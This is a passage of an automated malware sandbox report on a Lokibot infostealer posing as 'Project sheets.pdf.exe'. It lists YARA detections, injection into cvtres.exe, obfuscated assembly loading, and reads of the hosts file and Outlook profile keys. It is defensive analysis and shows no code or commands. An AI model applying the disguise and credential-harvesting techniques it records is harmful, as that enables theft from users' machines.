                Source: 00000003.00000002.500576224.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Lokibot_1f885282 reference_sample = 916eded682d11cbdf4bc872a8c1bcaae4d4e038ac0f869f59cc0a83867076409, os = windows, severity = x86, creation_date = 2021-06-22, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Lokibot, fingerprint = a7519bb0751a6c928af7548eaed2459e0ed26128350262d1278f74f2ad91331b, id = 1f885282-b60e-491e-ae1b-d26825e5aadb, last_modified = 2021-08-23
                Source: 00000003.00000002.500576224.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Lokibot_0f421617 reference_sample = de6200b184832e7d3bfe00c193034192774e3cfca96120dc97ad6fed1e472080, os = windows, severity = x86, creation_date = 2021-07-20, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Lokibot, fingerprint = 9ff5d594428e4a5de84f0142dfa9f54cb75489192461deb978c70f1bdc88acda, id = 0f421617-df2b-4cb5-9d10-d984f6553012, last_modified = 2021-08-23
                Source: 00000003.00000002.500576224.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORYMatched rule: Loki_1 author = kevoreilly, description = Loki Payload, cape_type = Loki Payload
                Source: 00000003.00000002.500576224.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORYMatched rule: Lokibot hash1 = 6f12da360ee637a8eb075fb314e002e3833b52b155ad550811ee698b49f37e8c, author = JPCERT/CC Incident Response Group, description = detect Lokibot in memory, rule_usage = memory scan, reference = internal research
                Source: 00000003.00000000.244592530.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORYMatched rule: INDICATOR_SUSPICIOUS_GENInfoStealer author = ditekSHen, description = Detects executables containing common artifcats observed in infostealers
                Source: 00000003.00000000.244592530.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Lokibot_1f885282 reference_sample = 916eded682d11cbdf4bc872a8c1bcaae4d4e038ac0f869f59cc0a83867076409, os = windows, severity = x86, creation_date = 2021-06-22, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Lokibot, fingerprint = a7519bb0751a6c928af7548eaed2459e0ed26128350262d1278f74f2ad91331b, id = 1f885282-b60e-491e-ae1b-d26825e5aadb, last_modified = 2021-08-23
                Source: 00000003.00000000.244592530.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Lokibot_0f421617 reference_sample = de6200b184832e7d3bfe00c193034192774e3cfca96120dc97ad6fed1e472080, os = windows, severity = x86, creation_date = 2021-07-20, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Lokibot, fingerprint = 9ff5d594428e4a5de84f0142dfa9f54cb75489192461deb978c70f1bdc88acda, id = 0f421617-df2b-4cb5-9d10-d984f6553012, last_modified = 2021-08-23
                Source: 00000003.00000000.244592530.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORYMatched rule: Loki_1 author = kevoreilly, description = Loki Payload, cape_type = Loki Payload
                Source: 00000003.00000000.244592530.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORYMatched rule: Lokibot hash1 = 6f12da360ee637a8eb075fb314e002e3833b52b155ad550811ee698b49f37e8c, author = JPCERT/CC Incident Response Group, description = detect Lokibot in memory, rule_usage = memory scan, reference = internal research
                Source: 00000003.00000000.244853180.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORYMatched rule: INDICATOR_SUSPICIOUS_GENInfoStealer author = ditekSHen, description = Detects executables containing common artifcats observed in infostealers
                Source: 00000003.00000000.244853180.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Lokibot_1f885282 reference_sample = 916eded682d11cbdf4bc872a8c1bcaae4d4e038ac0f869f59cc0a83867076409, os = windows, severity = x86, creation_date = 2021-06-22, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Lokibot, fingerprint = a7519bb0751a6c928af7548eaed2459e0ed26128350262d1278f74f2ad91331b, id = 1f885282-b60e-491e-ae1b-d26825e5aadb, last_modified = 2021-08-23
                Source: 00000003.00000000.244853180.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Lokibot_0f421617 reference_sample = de6200b184832e7d3bfe00c193034192774e3cfca96120dc97ad6fed1e472080, os = windows, severity = x86, creation_date = 2021-07-20, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Lokibot, fingerprint = 9ff5d594428e4a5de84f0142dfa9f54cb75489192461deb978c70f1bdc88acda, id = 0f421617-df2b-4cb5-9d10-d984f6553012, last_modified = 2021-08-23
                Source: 00000003.00000000.244853180.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORYMatched rule: Loki_1 author = kevoreilly, description = Loki Payload, cape_type = Loki Payload
                Source: 00000003.00000000.244853180.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORYMatched rule: Lokibot hash1 = 6f12da360ee637a8eb075fb314e002e3833b52b155ad550811ee698b49f37e8c, author = JPCERT/CC Incident Response Group, description = detect Lokibot in memory, rule_usage = memory scan, reference = internal research
                Source: 00000000.00000002.246208717.00000000041D1000.00000004.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Lokibot_1f885282 reference_sample = 916eded682d11cbdf4bc872a8c1bcaae4d4e038ac0f869f59cc0a83867076409, os = windows, severity = x86, creation_date = 2021-06-22, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Lokibot, fingerprint = a7519bb0751a6c928af7548eaed2459e0ed26128350262d1278f74f2ad91331b, id = 1f885282-b60e-491e-ae1b-d26825e5aadb, last_modified = 2021-08-23
                Source: 00000000.00000002.246208717.00000000041D1000.00000004.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Lokibot_0f421617 reference_sample = de6200b184832e7d3bfe00c193034192774e3cfca96120dc97ad6fed1e472080, os = windows, severity = x86, creation_date = 2021-07-20, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Lokibot, fingerprint = 9ff5d594428e4a5de84f0142dfa9f54cb75489192461deb978c70f1bdc88acda, id = 0f421617-df2b-4cb5-9d10-d984f6553012, last_modified = 2021-08-23
                Source: 00000000.00000002.246208717.00000000041D1000.00000004.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: Lokibot hash1 = 6f12da360ee637a8eb075fb314e002e3833b52b155ad550811ee698b49f37e8c, author = JPCERT/CC Incident Response Group, description = detect Lokibot in memory, rule_usage = memory scan, reference = internal research
                Source: 00000003.00000000.243877833.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORYMatched rule: INDICATOR_SUSPICIOUS_GENInfoStealer author = ditekSHen, description = Detects executables containing common artifcats observed in infostealers
                Source: 00000003.00000000.243877833.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Lokibot_1f885282 reference_sample = 916eded682d11cbdf4bc872a8c1bcaae4d4e038ac0f869f59cc0a83867076409, os = windows, severity = x86, creation_date = 2021-06-22, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Lokibot, fingerprint = a7519bb0751a6c928af7548eaed2459e0ed26128350262d1278f74f2ad91331b, id = 1f885282-b60e-491e-ae1b-d26825e5aadb, last_modified = 2021-08-23
                Source: 00000003.00000000.243877833.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Lokibot_0f421617 reference_sample = de6200b184832e7d3bfe00c193034192774e3cfca96120dc97ad6fed1e472080, os = windows, severity = x86, creation_date = 2021-07-20, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Lokibot, fingerprint = 9ff5d594428e4a5de84f0142dfa9f54cb75489192461deb978c70f1bdc88acda, id = 0f421617-df2b-4cb5-9d10-d984f6553012, last_modified = 2021-08-23
                Source: 00000003.00000000.243877833.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORYMatched rule: Loki_1 author = kevoreilly, description = Loki Payload, cape_type = Loki Payload
                Source: 00000003.00000000.243877833.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORYMatched rule: Lokibot hash1 = 6f12da360ee637a8eb075fb314e002e3833b52b155ad550811ee698b49f37e8c, author = JPCERT/CC Incident Response Group, description = detect Lokibot in memory, rule_usage = memory scan, reference = internal research
                Source: 00000003.00000000.244125189.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORYMatched rule: INDICATOR_SUSPICIOUS_GENInfoStealer author = ditekSHen, description = Detects executables containing common artifcats observed in infostealers
                Source: 00000003.00000000.244125189.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Lokibot_1f885282 reference_sample = 916eded682d11cbdf4bc872a8c1bcaae4d4e038ac0f869f59cc0a83867076409, os = windows, severity = x86, creation_date = 2021-06-22, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Lokibot, fingerprint = a7519bb0751a6c928af7548eaed2459e0ed26128350262d1278f74f2ad91331b, id = 1f885282-b60e-491e-ae1b-d26825e5aadb, last_modified = 2021-08-23
                Source: 00000003.00000000.244125189.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Lokibot_0f421617 reference_sample = de6200b184832e7d3bfe00c193034192774e3cfca96120dc97ad6fed1e472080, os = windows, severity = x86, creation_date = 2021-07-20, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Lokibot, fingerprint = 9ff5d594428e4a5de84f0142dfa9f54cb75489192461deb978c70f1bdc88acda, id = 0f421617-df2b-4cb5-9d10-d984f6553012, last_modified = 2021-08-23
                Source: 00000003.00000000.244125189.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORYMatched rule: Loki_1 author = kevoreilly, description = Loki Payload, cape_type = Loki Payload
                Source: 00000003.00000000.244125189.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORYMatched rule: Lokibot hash1 = 6f12da360ee637a8eb075fb314e002e3833b52b155ad550811ee698b49f37e8c, author = JPCERT/CC Incident Response Group, description = detect Lokibot in memory, rule_usage = memory scan, reference = internal research
                Source: Process Memory Space: Project sheets.pdf.exe PID: 5648, type: MEMORYSTRMatched rule: Windows_Trojan_Lokibot_1f885282 reference_sample = 916eded682d11cbdf4bc872a8c1bcaae4d4e038ac0f869f59cc0a83867076409, os = windows, severity = x86, creation_date = 2021-06-22, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Lokibot, fingerprint = a7519bb0751a6c928af7548eaed2459e0ed26128350262d1278f74f2ad91331b, id = 1f885282-b60e-491e-ae1b-d26825e5aadb, last_modified = 2021-08-23
                Source: Process Memory Space: cvtres.exe PID: 3896, type: MEMORYSTRMatched rule: Windows_Trojan_Lokibot_1f885282 reference_sample = 916eded682d11cbdf4bc872a8c1bcaae4d4e038ac0f869f59cc0a83867076409, os = windows, severity = x86, creation_date = 2021-06-22, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Lokibot, fingerprint = a7519bb0751a6c928af7548eaed2459e0ed26128350262d1278f74f2ad91331b, id = 1f885282-b60e-491e-ae1b-d26825e5aadb, last_modified = 2021-08-23
                Source: C:\Users\user\Desktop\Project sheets.pdf.exeCode function: 0_2_017F3130
                Source: C:\Users\user\Desktop\Project sheets.pdf.exeCode function: 0_2_017F9468
                Source: C:\Users\user\Desktop\Project sheets.pdf.exeCode function: 0_2_017F0448
                Source: C:\Users\user\Desktop\Project sheets.pdf.exeCode function: 0_2_017F40D8
                Source: C:\Users\user\Desktop\Project sheets.pdf.exeCode function: 0_2_017F2758
                Source: C:\Users\user\Desktop\Project sheets.pdf.exeCode function: 0_2_017F1F08
                Source: C:\Users\user\Desktop\Project sheets.pdf.exeCode function: 0_2_017F9929
                Source: C:\Users\user\Desktop\Project sheets.pdf.exeCode function: 0_2_017FA5D0
                Source: C:\Users\user\Desktop\Project sheets.pdf.exeCode function: 0_2_017F61C8
                Source: C:\Users\user\Desktop\Project sheets.pdf.exeCode function: 0_2_017FA5C0
                Source: C:\Users\user\Desktop\Project sheets.pdf.exeCode function: 0_2_017F61B9
                Source: C:\Users\user\Desktop\Project sheets.pdf.exeCode function: 0_2_017F9459
                Source: C:\Users\user\Desktop\Project sheets.pdf.exeCode function: 0_2_017F4030
                Source: C:\Users\user\Desktop\Project sheets.pdf.exeCode function: 0_2_017F40C8
                Source: C:\Users\user\Desktop\Project sheets.pdf.exeCode function: 0_2_017F5B58
                Source: C:\Users\user\Desktop\Project sheets.pdf.exeCode function: 0_2_017F5B50
                Source: C:\Users\user\Desktop\Project sheets.pdf.exeCode function: 0_2_017F63E8
                Source: C:\Users\user\Desktop\Project sheets.pdf.exeCode function: 0_2_017F63D9
                Source: C:\Users\user\Desktop\Project sheets.pdf.exeCode function: 0_2_017F7BC8
                Source: C:\Users\user\Desktop\Project sheets.pdf.exeCode function: 0_2_017F4FA8
                Source: C:\Users\user\Desktop\Project sheets.pdf.exeCode function: 0_2_017F4F98
                Source: C:\Users\user\Desktop\Project sheets.pdf.exeCode function: 0_2_017F1E68
                Source: C:\Users\user\Desktop\Project sheets.pdf.exeCode function: 0_2_017F5E53
                Source: C:\Users\user\Desktop\Project sheets.pdf.exeCode function: 0_2_017F6E08
                Source: C:\Users\user\Desktop\Project sheets.pdf.exeCode function: 0_2_017F1ECF
                Source: C:\Users\user\Desktop\Project sheets.pdf.exeCode function: 0_2_017F6698
                Source: C:\Users\user\Desktop\Project sheets.pdf.exeCode function: 0_2_017F6689
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exeCode function: 3_2_0040549C
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exeCode function: 3_2_004029D4
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exeCode function: String function: 0041219C appears 45 times
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exeCode function: String function: 00405B6F appears 42 times
                Source: Project sheets.pdf.exe, 00000000.00000000.235919369.0000000000E42000.00000002.00000001.01000000.00000003.sdmpBinary or memory string: OriginalFilenameQQBCXNMHJF.exe6 vs Project sheets.pdf.exe
                Source: Project sheets.pdf.exe, 00000000.00000002.245997342.0000000003130000.00000004.08000000.00040000.00000000.sdmpBinary or memory string: OriginalFilenameWHGDFHKDLHDJD.dll< vs Project sheets.pdf.exe
                Source: Project sheets.pdf.exe, 00000000.00000002.245726973.0000000001528000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: OriginalFilenameclr.dllT vs Project sheets.pdf.exe
                Source: Project sheets.pdf.exe, 00000000.00000002.246034817.00000000031D1000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: OriginalFilenameWHGDFHKDLHDJD.dll< vs Project sheets.pdf.exe
                Source: Project sheets.pdf.exe, 00000000.00000002.246236248.00000000041EF000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: OriginalFilenameResourceAssembly.dllD vs Project sheets.pdf.exe
                Source: Project sheets.pdf.exeBinary or memory string: OriginalFilenameQQBCXNMHJF.exe6 vs Project sheets.pdf.exe
                Source: Project sheets.pdf.exeStatic PE information: Resource name: RT_ICON type: GLS_BINARY_LSB_FIRST
                Source: Project sheets.pdf.exeStatic PE information: invalid certificate
                Source: Project sheets.pdf.exeStatic PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
                Source: Project sheets.pdf.exeStatic PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
                Source: C:\Users\user\Desktop\Project sheets.pdf.exeKey opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers
                Source: unknownProcess created: C:\Users\user\Desktop\Project sheets.pdf.exe "C:\Users\user\Desktop\Project sheets.pdf.exe"
                Source: C:\Users\user\Desktop\Project sheets.pdf.exeProcess created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe
                Source: C:\Users\user\Desktop\Project sheets.pdf.exeProcess created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe
                Source: C:\Users\user\Desktop\Project sheets.pdf.exeProcess created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe
                Source: C:\Users\user\Desktop\Project sheets.pdf.exeProcess created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe
                Source: C:\Users\user\Desktop\Project sheets.pdf.exeProcess created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe
                Source: C:\Users\user\Desktop\Project sheets.pdf.exeProcess created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exeCode function: 3_2_0040650A LookupPrivilegeValueW,AdjustTokenPrivileges,
                Source: C:\Users\user\Desktop\Project sheets.pdf.exeFile created: C:\Users\user\AppData\Local\Microsoft\CLR_v4.0_32\UsageLogs\Project sheets.pdf.exe.logJump to behavior
                Source: classification engineClassification label: mal100.troj.spyw.evad.winEXE@7/3@74/3
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exeCode function: 3_2_0040434D CoInitialize,CoCreateInstance,VariantInit,SysAllocString,VariantInit,VariantInit,SysAllocString,VariantInit,SysFreeString,SysFreeString,CoUninitialize,
                Source: Project sheets.pdf.exeStatic file information: TRID: Win32 Executable (generic) Net Framework (10011505/4) 50.01%
                Source: C:\Users\user\Desktop\Project sheets.pdf.exeSection loaded: C:\Windows\assembly\NativeImages_v4.0.30319_32\mscorlib\a152fe02a317a77aeee36903305e8ba6\mscorlib.ni.dll
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exeMutant created: \Sessions\1\BaseNamedObjects\8F9C4E9C79A3B52B3F739430
                Source: Project sheets.pdf.exe, u202c????????????????????????????????????????.csCryptographic APIs: 'CreateDecryptor'
                Source: Project sheets.pdf.exe, u202c????????????????????????????????????????.csCryptographic APIs: 'TransformBlock'
                Source: Project sheets.pdf.exe, u202c????????????????????????????????????????.csCryptographic APIs: 'TransformFinalBlock'
                Source: 0.0.Project sheets.pdf.exe.e40000.0.unpack, u202c????????????????????????????????????????.csCryptographic APIs: 'CreateDecryptor'
                Source: 0.0.Project sheets.pdf.exe.e40000.0.unpack, u202c????????????????????????????????????????.csCryptographic APIs: 'TransformBlock'
                Source: 0.0.Project sheets.pdf.exe.e40000.0.unpack, u202c????????????????????????????????????????.csCryptographic APIs: 'TransformFinalBlock'
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exeFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exeFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exeFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exeFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
                Source: C:\Users\user\Desktop\Project sheets.pdf.exeFile opened: C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorrc.dll
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exeKey opened: HKEY_CURRENT_USER\Software\Microsoft\Office\15.0\Outlook\Profiles\Outlook
                Source: Project sheets.pdf.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR
                Source: Project sheets.pdf.exeStatic PE information: HIGH_ENTROPY_VA, DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE
                Source: Project sheets.pdf.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_DEBUG
                Source: Binary string: WHGDFHKDLHDJD.pdb source: Project sheets.pdf.exe, 00000000.00000002.245997342.0000000003130000.00000004.08000000.00040000.00000000.sdmp, Project sheets.pdf.exe, 00000000.00000002.246034817.00000000031D1000.00000004.00000800.00020000.00000000.sdmp
                Source: Binary string: QQBCXNMHJF.pdb source: Project sheets.pdf.exe

                Data Obfuscation

                barindex
                Source: Yara matchFile source: 3.0.cvtres.exe.400000.4.raw.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 3.0.cvtres.exe.400000.3.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 3.0.cvtres.exe.400000.1.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 3.0.cvtres.exe.400000.2.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 3.0.cvtres.exe.400000.3.raw.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 3.2.cvtres.exe.400000.0.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 3.2.cvtres.exe.400000.0.raw.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 3.0.cvtres.exe.400000.4.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 3.0.cvtres.exe.400000.5.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 0.2.Project sheets.pdf.exe.41d5530.5.raw.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 3.0.cvtres.exe.400000.2.raw.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 0.2.Project sheets.pdf.exe.41d5530.5.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 3.0.cvtres.exe.400000.5.raw.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 3.0.cvtres.exe.400000.0.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 00000000.00000002.246158939.0000000003200000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000003.00000002.500576224.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000003.00000000.244592530.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000003.00000000.244853180.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000000.00000002.246208717.00000000041D1000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000003.00000000.243877833.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000003.00000000.244125189.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: Process Memory Space: Project sheets.pdf.exe PID: 5648, type: MEMORYSTR
                Source: Yara matchFile source: Process Memory Space: cvtres.exe PID: 3896, type: MEMORYSTR
                Source: Project sheets.pdf.exe, u200b????????????????????????????????????????.cs.Net Code: ????????????????????????????????????????? System.Reflection.Assembly System.Reflection.Assembly::Load(System.Byte[])
                Source: Project sheets.pdf.exe, u206f????????????????????????????????????????.cs.Net Code: ????????????????????????????????????????? System.Reflection.Assembly System.Reflection.Assembly::Load(System.Byte[])
                Source: 0.0.Project sheets.pdf.exe.e40000.0.unpack, u200b????????????????????????????????????????.cs.Net Code: ????????????????????????????????????????? System.Reflection.Assembly System.Reflection.Assembly::Load(System.Byte[])
                Source: 0.0.Project sheets.pdf.exe.e40000.0.unpack, u206f????????????????????????????????????????.cs.Net Code: ????????????????????????????????????????? System.Reflection.Assembly System.Reflection.Assembly::Load(System.Byte[])
                Source: C:\Users\user\Desktop\Project sheets.pdf.exeCode function: 0_2_017F88F7 pushfd ; iretd
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exeCode function: 3_2_00402AC0 push eax; ret
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exeCode function: 3_2_00402AC0 push eax; ret
                Source: Project sheets.pdf.exeStatic PE information: real checksum: 0x34a44 should be: 0x37cfc
                Source: initial sampleStatic PE information: section name: .text entropy: 7.534046578744168

                Hooking and other Techniques for Hiding and Protection

                barindex
                Source: Possible double extension: pdf.exeStatic PE information: Project sheets.pdf.exe
                Source: C:\Users\user\Desktop\Project sheets.pdf.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Users\user\Desktop\Project sheets.pdf.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Users\user\Desktop\Project sheets.pdf.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Users\user\Desktop\Project sheets.pdf.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Users\user\Desktop\Project sheets.pdf.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Users\user\Desktop\Project sheets.pdf.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Users\user\Desktop\Project sheets.pdf.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Users\user\Desktop\Project sheets.pdf.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Users\user\Desktop\Project sheets.pdf.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Users\user\Desktop\Project sheets.pdf.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Users\user\Desktop\Project sheets.pdf.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Users\user\Desktop\Project sheets.pdf.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exeProcess information set: NOGPFAULTERRORBOX
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exeProcess information set: NOGPFAULTERRORBOX
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exeProcess information set: NOGPFAULTERRORBOX
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exeProcess information set: NOGPFAULTERRORBOX
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exeProcess information set: NOGPFAULTERRORBOX
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exeProcess information set: NOGPFAULTERRORBOX
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exeProcess information set: NOGPFAULTERRORBOX
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exeProcess information set: NOGPFAULTERRORBOX
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exeProcess information set: NOGPFAULTERRORBOX
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exeProcess information set: NOGPFAULTERRORBOX
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exeProcess information set: NOGPFAULTERRORBOX
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exeProcess information set: NOGPFAULTERRORBOX
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exeProcess information set: NOGPFAULTERRORBOX
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exeProcess information set: NOGPFAULTERRORBOX
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exeProcess information set: NOGPFAULTERRORBOX
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exeProcess information set: NOGPFAULTERRORBOX
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exeProcess information set: NOGPFAULTERRORBOX
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exeProcess information set: NOGPFAULTERRORBOX
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exeProcess information set: NOGPFAULTERRORBOX
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exeProcess information set: NOGPFAULTERRORBOX
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exeProcess information set: NOGPFAULTERRORBOX
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exeProcess information set: NOGPFAULTERRORBOX
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exeProcess information set: NOGPFAULTERRORBOX
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exeProcess information set: NOGPFAULTERRORBOX
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exeProcess information set: NOGPFAULTERRORBOX
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exeProcess information set: NOGPFAULTERRORBOX
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exeProcess information set: NOGPFAULTERRORBOX
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exeProcess information set: NOGPFAULTERRORBOX
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exeProcess information set: NOGPFAULTERRORBOX
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exeProcess information set: NOGPFAULTERRORBOX
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exeProcess information set: NOGPFAULTERRORBOX
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exeProcess information set: NOGPFAULTERRORBOX
